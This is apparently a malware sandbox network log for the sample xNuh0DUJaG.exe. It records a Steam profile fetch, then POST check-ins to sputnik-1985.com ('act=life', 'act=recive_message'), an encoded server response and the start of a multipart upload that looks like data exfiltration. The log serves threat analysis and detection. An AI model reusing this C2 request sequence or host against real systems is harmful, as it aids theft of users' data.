                                                                                                                                                                                                                                      2025-01-11 06:48:33 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                      2025-01-11 06:48:34 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                                                      Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                                                      2025-01-11 06:48:34 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                                                      Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                                                      2025-01-11 06:48:34 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                      Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.1049708104.21.80.14437464C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-11 06:48:34 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                      Host: sputnik-1985.com
                                                                                                                                                                                                                                      2025-01-11 06:48:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                      2025-01-11 06:48:35 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Sat, 11 Jan 2025 06:48:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=p1bejmrcbm60sf2cokplcsnbvo; expires=Wed, 07 May 2025 00:35:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qd1C%2FHtDA%2BK%2B88eZDTbyxRiYrtgd9pd096rxoPJFfy4zDrVhxxXOh9X4mfDuz%2FQJGxMLsFDEv7di9f0%2BPQtskhIyCV0NTmQ0XLeTK7MatEqVmZmWi5DIDmfT5EfGRXXStTHI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 9002f640af8142d2-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1553&rtt_var=590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1843434&cwnd=229&unsent_bytes=0&cid=949ce856bcc69d52&ts=455&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                      2025-01-11 06:48:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.1049714104.21.80.14437464C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-11 06:48:35 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 74
                                                                                                                                                                                                                                      Host: sputnik-1985.com
                                                                                                                                                                                                                                      2025-01-11 06:48:35 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Sat, 11 Jan 2025 06:48:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=qojqve21keiginspivr699iomp; expires=Wed, 07 May 2025 00:35:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKgO%2BWYJyYo6zCOPxNSDJZUwB9h%2FJSZeRYVvcYd3pvz%2B1ZIaExxXekNCE6ptNJ1wRYfmtURQHFr7J4PMeqVnCWYq1F2XEvbcnZuH6oKADnMfTPHN4cUmxdO1YAymTKnR9cn0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 9002f647aafb43ee-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1654&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=974&delivery_rate=1686886&cwnd=228&unsent_bytes=0&cid=629d85fbe8463ccf&ts=513&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC248INData Raw: 34 36 39 0d 0a 52 33 7a 46 57 4f 73 74 6a 5a 2b 71 38 67 6b 4d 2b 38 70 69 43 51 34 63 42 30 5a 63 57 6e 67 36 2b 73 6d 67 76 75 4b 52 55 52 77 38 58 72 4e 36 30 52 6d 68 76 64 6d 58 4b 7a 61 50 75 42 64 73 49 6a 35 6d 49 6e 35 67 48 6c 75 57 75 73 57 53 77 4f 63 38 50 6e 30 61 70 44 53 59 53 4b 47 39 7a 34 6f 72 4e 71 43 78 51 47 78 67 50 6a 31 6b 4f 54 41 61 57 35 61 72 77 64 57 4e 34 54 31 2f 4c 78 43 69 4d 49 35 4f 36 66 37 47 6e 32 78 70 6e 71 73 49 5a 32 64 78 62 79 74 2b 64 6c 70 66 67 4f 75 61 6e 4b 2f 30 4a 58 30 4b 48 62 59 7a 79 56 43 68 35 49 69 58 5a 79 37 42 36 41 4e 73 62 48 42 68 49 6a 63 79 45 46 4b 65 71 73 54 55 6b 76 67 33 64 43 38 65 6f 54 47 45 52 2f 33 7a 7a 4a 68 6e 62 35 53 72 51 43 55 73 65 58 31 6b 5a 6e 68
                                                                                                                                                                                                                                      Data Ascii: 469R3zFWOstjZ+q8gkM+8piCQ4cB0ZcWng6+smgvuKRURw8XrN60RmhvdmXKzaPuBdsIj5mIn5gHluWusWSwOc8Pn0apDSYSKG9z4orNqCxQGxgPj1kOTAaW5arwdWN4T1/LxCiMI5O6f7Gn2xpnqsIZ2dxbyt+dlpfgOuanK/0JX0KHbYzyVCh5IiXZy7B6ANsbHBhIjcyEFKeqsTUkvg3dC8eoTGER/3zzJhnb5SrQCUseX1kZnh
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC888INData Raw: 4a 61 70 75 36 30 38 6d 4e 34 7a 55 2b 4f 6c 43 2b 65 6f 35 44 72 36 57 49 6d 47 64 67 6e 4b 73 50 62 47 31 2b 64 79 73 2b 4f 78 4a 51 6e 4b 48 4e 30 34 2f 39 4f 58 6b 74 46 36 41 31 6a 6b 66 70 38 73 76 51 4a 53 36 65 73 45 41 7a 4c 46 35 31 4a 7a 30 73 46 30 6e 59 74 49 7a 46 77 50 51 2f 50 6e 31 65 6f 54 53 49 51 75 2f 76 77 4a 74 67 61 34 75 6a 43 57 5a 68 66 6d 67 75 4d 54 73 61 58 35 4b 68 7a 64 61 45 2f 6a 35 34 4a 52 37 6e 64 4d 6c 49 39 37 32 51 30 45 68 72 69 61 38 4d 66 53 35 45 4a 54 74 77 49 56 70 66 6c 4f 75 61 6e 49 6a 32 4d 48 30 75 45 61 51 79 67 6c 33 76 37 38 36 64 62 6e 79 66 72 51 35 68 62 32 78 76 4b 6a 67 37 45 31 4f 52 72 73 58 59 77 4c 31 7a 65 54 31 65 2f 33 71 6f 51 75 54 78 77 6f 64 72 4c 6f 62 6d 47 53 74 72 63 69 56 38 66 6a
                                                                                                                                                                                                                                      Data Ascii: Japu608mN4zU+OlC+eo5Dr6WImGdgnKsPbG1+dys+OxJQnKHN04/9OXktF6A1jkfp8svQJS6esEAzLF51Jz0sF0nYtIzFwPQ/Pn1eoTSIQu/vwJtga4ujCWZhfmguMTsaX5KhzdaE/j54JR7ndMlI972Q0Ehria8MfS5EJTtwIVpflOuanIj2MH0uEaQygl3v786dbnyfrQ5hb2xvKjg7E1ORrsXYwL1zeT1e/3qoQuTxwodrLobmGStrciV8fj
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 34 38 32 37 0d 0a 57 68 69 63 47 49 79 66 69 64 55 51 64 69 73 7a 70 7a 59 73 7a 78 78 4b 68 61 6e 4f 34 31 43 36 2f 7a 46 6e 47 4a 74 6c 61 51 49 5a 6d 42 36 61 69 77 32 4f 78 4a 4b 6c 71 58 45 32 6f 44 32 63 7a 42 6c 47 62 39 36 30 51 2f 4c 38 39 2b 45 59 43 79 73 71 77 35 6c 61 32 67 6c 4f 33 41 68 57 6c 2b 55 36 35 71 63 6a 76 34 34 63 69 49 58 70 6a 6d 4a 52 65 48 79 77 70 68 6a 62 70 53 70 43 32 4e 71 63 32 34 72 4d 54 38 53 57 35 53 75 7a 39 2f 41 76 58 4e 35 50 56 37 2f 65 71 78 42 37 4f 7a 5a 30 6c 35 74 6c 36 59 48 66 53 78 68 4b 7a 31 2b 50 78 59 59 77 4f 76 49 32 34 66 33 50 6e 51 6d 47 71 4d 33 68 6b 62 6d 39 4e 71 61 5a 32 43 4c 70 51 70 75 59 6e 4a 67 4b 7a 34 35 47 31 61 53 6f 49 4b 53 77 50 51 72 50 6e 31 65 69 44 65 5a 58 65 58 32 32 64
                                                                                                                                                                                                                                      Data Ascii: 4827WhicGIyfidUQdiszpzYszxxKhanO41C6/zFnGJtlaQIZmB6aiw2OxJKlqXE2oD2czBlGb960Q/L89+EYCysqw5la2glO3AhWl+U65qcjv44ciIXpjmJReHywphjbpSpC2Nqc24rMT8SW5Suz9/AvXN5PV7/eqxB7OzZ0l5tl6YHfSxhKz1+PxYYwOvI24f3PnQmGqM3hkbm9NqaZ2CLpQpuYnJgKz45G1aSoIKSwPQrPn1eiDeZXeX22d
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 73 45 41 7a 4c 46 46 6d 4d 6a 52 34 42 52 61 42 36 38 58 51 77 4b 74 7a 64 43 6b 61 70 44 61 41 51 2b 4c 38 7a 4a 64 6d 61 70 6d 75 42 6d 35 74 64 57 30 6f 4d 54 49 57 58 4a 53 69 78 4e 43 44 38 44 55 2b 61 31 36 67 49 73 6b 58 72 39 7a 46 6d 32 64 75 6d 72 6b 48 4b 79 49 2b 61 79 49 2b 65 45 4a 4f 69 4c 7a 46 77 38 37 71 63 33 6b 70 58 76 39 36 67 31 33 71 38 38 79 61 62 6d 71 56 6f 67 42 75 66 6e 5a 6a 49 7a 49 77 48 31 65 65 72 73 2f 62 69 2f 41 68 62 43 59 61 71 54 62 4a 41 61 2f 36 30 4e 41 7a 4c 72 79 2f 41 33 74 71 66 53 55 37 63 43 46 61 58 35 54 72 6d 70 79 41 2f 54 39 31 49 68 57 73 50 6f 31 50 34 76 62 47 6e 6d 4a 69 6b 61 51 48 65 57 46 37 62 53 34 33 50 52 5a 56 6d 37 6e 42 33 63 43 39 63 33 6b 39 58 76 39 36 72 6e 7a 59 33 6f 69 50 4a 58 66
                                                                                                                                                                                                                                      Data Ascii: sEAzLFFmMjR4BRaB68XQwKtzdCkapDaAQ+L8zJdmapmuBm5tdW0oMTIWXJSixNCD8DU+a16gIskXr9zFm2dumrkHKyI+ayI+eEJOiLzFw87qc3kpXv96g13q88yabmqVogBufnZjIzIwH1eers/bi/AhbCYaqTbJAa/60NAzLry/A3tqfSU7cCFaX5TrmpyA/T91IhWsPo1P4vbGnmJikaQHeWF7bS43PRZVm7nB3cC9c3k9Xv96rnzY3oiPJXf
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 7a 51 2b 53 53 63 78 4d 31 70 48 31 72 4b 43 32 34 79 7a 61 7a 34 69 46 71 38 30 69 6b 6e 6b 38 63 53 52 59 6d 69 63 6f 41 64 6b 61 33 64 69 4a 44 67 71 48 56 57 52 71 38 6e 56 69 76 63 79 64 57 56 51 35 7a 32 52 44 37 65 39 2b 70 64 39 66 70 72 6f 48 79 56 31 50 6d 49 6f 66 6d 42 61 56 59 71 71 78 38 36 45 2f 44 68 73 4c 68 69 6e 50 35 74 49 34 2f 66 48 6b 32 4e 6a 6d 71 41 53 61 32 46 2b 64 7a 59 34 4d 78 51 59 31 75 76 46 78 4d 43 72 63 30 38 79 46 65 63 6c 78 31 61 76 2b 73 54 51 4d 79 36 61 6f 67 31 6c 66 6e 70 6a 4c 7a 30 32 45 6c 32 51 72 38 6a 52 6a 2f 67 35 64 79 30 65 71 44 2b 42 52 4f 6e 7a 79 5a 5a 6e 59 39 6e 6d 51 47 78 30 50 6a 31 6b 47 53 49 58 58 6f 2b 36 39 39 75 41 6f 6e 4e 68 61 77 66 6e 50 59 55 50 74 37 33 46 6e 47 46 6a 6e 4b 77 49
                                                                                                                                                                                                                                      Data Ascii: zQ+SScxM1pH1rKC24yzaz4iFq80iknk8cSRYmicoAdka3diJDgqHVWRq8nVivcydWVQ5z2RD7e9+pd9fproHyV1PmIofmBaVYqqx86E/DhsLhinP5tI4/fHk2NjmqASa2F+dzY4MxQY1uvFxMCrc08yFeclx1av+sTQMy6aog1lfnpjLz02El2Qr8jRj/g5dy0eqD+BROnzyZZnY9nmQGx0Pj1kGSIXXo+699uAonNhawfnPYUPt73FnGFjnKwI
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 73 39 66 6a 38 57 47 4d 44 72 7a 4e 47 47 38 6a 4a 32 4c 52 36 68 4d 49 31 4d 35 76 37 50 6d 57 31 6c 6d 71 49 50 62 47 70 36 5a 53 38 35 4e 68 78 64 6b 36 4b 43 6b 73 44 30 4b 7a 35 39 58 6f 45 5a 6d 31 33 64 38 38 75 4c 4b 33 48 58 73 55 42 73 59 44 34 39 5a 44 55 77 46 55 71 64 6f 73 72 59 69 66 4d 33 64 43 67 5a 70 7a 2b 45 53 75 76 7a 7a 4a 64 72 59 70 61 76 43 47 52 6f 66 6d 70 6b 63 48 67 64 51 4e 6a 7a 67 76 79 4c 35 52 4a 77 4c 67 7a 6e 4a 63 64 57 72 2f 72 45 30 44 4d 75 6c 36 45 42 59 32 4a 79 62 53 41 73 4f 42 46 52 6c 36 72 4e 33 49 50 79 4f 58 59 33 47 4b 63 78 67 55 6a 6e 2b 63 61 43 61 6d 48 5a 35 6b 42 73 64 44 34 39 5a 41 38 75 48 56 2b 58 36 65 76 62 6d 2f 49 35 66 53 34 53 35 79 58 48 56 71 2f 36 78 4e 41 7a 4c 70 53 6b 44 57 39 2b 63
                                                                                                                                                                                                                                      Data Ascii: s9fj8WGMDrzNGG8jJ2LR6hMI1M5v7PmW1lmqIPbGp6ZS85Nhxdk6KCksD0Kz59XoEZm13d88uLK3HXsUBsYD49ZDUwFUqdosrYifM3dCgZpz+ESuvzzJdrYpavCGRofmpkcHgdQNjzgvyL5RJwLgznJcdWr/rE0DMul6EBY2JybSAsOBFRl6rN3IPyOXY3GKcxgUjn+caCamHZ5kBsdD49ZA8uHV+X6evbm/I5fS4S5yXHVq/6xNAzLpSkDW9+c
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 34 51 68 69 54 70 63 66 64 6a 50 6b 30 63 44 63 66 72 54 61 49 53 4f 6a 32 32 70 74 35 5a 5a 47 72 44 6d 4e 6c 66 6d 73 6b 50 7a 55 61 47 4e 62 72 78 63 54 41 71 33 4e 62 42 67 6d 78 4d 4d 74 73 2b 4f 76 43 6c 32 64 34 6b 71 6b 44 66 57 46 75 4a 57 70 2b 4b 52 31 4a 32 50 50 55 7a 4a 66 30 4c 44 41 38 58 71 41 32 79 52 65 76 39 73 65 65 5a 6d 57 64 6f 51 56 6a 62 33 74 67 4c 6a 49 30 47 31 43 52 6f 63 66 5a 68 76 6b 77 63 43 6f 66 71 7a 36 41 51 65 61 39 68 74 42 73 64 74 6e 77 51 46 31 38 65 58 30 70 4c 6e 6f 6f 57 34 6d 36 31 39 47 51 39 58 46 52 4a 68 4b 6b 50 34 35 66 72 2b 4b 47 69 53 74 70 6c 65 68 59 4b 32 78 36 61 53 63 35 4e 68 56 56 6c 36 7a 4a 30 34 72 39 49 58 45 67 46 71 73 79 68 46 33 6c 39 39 71 5a 59 6d 4f 58 6f 42 4a 6f 4c 44 41 6c 49 79
                                                                                                                                                                                                                                      Data Ascii: 4QhiTpcfdjPk0cDcfrTaISOj22pt5ZZGrDmNlfmskPzUaGNbrxcTAq3NbBgmxMMts+OvCl2d4kqkDfWFuJWp+KR1J2PPUzJf0LDA8XqA2yRev9seeZmWdoQVjb3tgLjI0G1CRocfZhvkwcCofqz6AQea9htBsdtnwQF18eX0pLnooW4m619GQ9XFRJhKkP45fr+KGiStplehYK2x6aSc5NhVVl6zJ04r9IXEgFqsyhF3l99qZYmOXoBJoLDAlIy
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 6d 2b 7a 38 34 71 44 34 4a 58 38 6f 46 61 73 45 74 31 72 73 38 38 61 58 66 58 2f 5a 35 6b 42 6b 4c 43 5a 63 5a 48 5a 34 4a 52 62 59 73 34 4b 45 77 4d 59 77 63 43 73 5a 73 53 76 45 62 2b 54 72 79 5a 31 67 59 74 75 70 44 58 74 72 50 69 74 6b 4f 48 68 43 43 4e 62 72 78 73 33 41 71 32 4d 73 66 6b 76 30 62 64 6b 64 38 4c 50 52 30 48 30 75 77 66 70 4f 4b 33 34 2b 50 57 52 35 4f 77 68 4b 6e 71 6a 55 33 38 66 4e 44 56 34 75 45 71 51 32 69 45 69 76 73 34 69 66 4b 7a 61 67 36 41 4e 35 66 6a 46 30 4d 6a 4d 6f 48 52 53 51 75 73 2f 51 77 4c 31 7a 4d 69 45 56 71 7a 2b 4f 58 36 44 76 32 4a 74 6e 65 4e 57 73 45 69 73 69 50 6e 51 76 4d 53 6f 55 58 39 65 36 31 4e 47 51 38 44 5a 35 61 52 61 32 4e 34 55 50 6f 62 33 64 6d 32 64 6f 6c 4c 31 50 65 6e 70 39 63 79 4e 79 4d 41 74
                                                                                                                                                                                                                                      Data Ascii: m+z84qD4JX8oFasEt1rs88aXfX/Z5kBkLCZcZHZ4JRbYs4KEwMYwcCsZsSvEb+TryZ1gYtupDXtrPitkOHhCCNbrxs3Aq2Msfkv0bdkd8LPR0H0uwfpOK34+PWR5OwhKnqjU38fNDV4uEqQ2iEivs4ifKzag6AN5fjF0MjMoHRSQus/QwL1zMiEVqz+OX6Dv2JtneNWsEisiPnQvMSoUX9e61NGQ8DZ5aRa2N4UPob3dm2dolL1Penp9cyNyMAt
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 5a 4c 41 36 33 4d 6d 5a 53 75 6b 4e 49 64 49 2b 65 79 46 74 6d 68 70 6e 36 73 4f 66 48 30 2b 4b 32 51 34 65 45 49 4b 31 75 76 47 7a 63 43 72 59 79 78 2b 53 2f 52 74 32 52 33 77 73 39 48 51 66 53 37 42 2b 30 34 72 66 6a 34 39 5a 48 6b 32 46 31 6d 62 70 63 48 4f 6b 76 55 77 61 43 5a 5a 6d 51 53 73 51 75 4c 34 78 70 64 56 55 4c 69 69 45 47 5a 6a 65 56 73 61 43 53 6b 64 53 4e 71 4e 77 63 71 44 73 33 30 2b 50 56 37 2f 65 71 68 46 2f 2f 44 48 6c 79 73 67 32 61 78 41 4d 79 78 62 61 43 6b 37 4e 68 30 61 75 61 48 53 30 59 2f 30 63 7a 42 6c 45 75 64 69 79 55 37 6c 37 63 57 66 62 43 4b 65 73 67 63 72 49 6a 35 72 5a 47 5a 34 47 31 4b 49 70 73 33 62 7a 50 55 39 63 47 55 42 36 53 50 4a 57 61 2b 6c 6d 39 34 72 66 4e 6e 77 51 43 78 69 63 32 51 6e 4d 44 73 49 53 70 36 6f
                                                                                                                                                                                                                                      Data Ascii: ZLA63MmZSukNIdI+eyFtmhpn6sOfH0+K2Q4eEIK1uvGzcCrYyx+S/Rt2R3ws9HQfS7B+04rfj49ZHk2F1mbpcHOkvUwaCZZmQSsQuL4xpdVULiiEGZjeVsaCSkdSNqNwcqDs30+PV7/eqhF//DHlysg2axAMyxbaCk7Nh0auaHS0Y/0czBlEudiyU7l7cWfbCKesgcrIj5rZGZ4G1KIps3bzPU9cGUB6SPJWa+lm94rfNnwQCxic2QnMDsISp6o


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.1049725104.21.80.14437464C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-11 06:48:37 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=OG13XW2VA62H57
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 12818
                                                                                                                                                                                                                                      Host: sputnik-1985.com
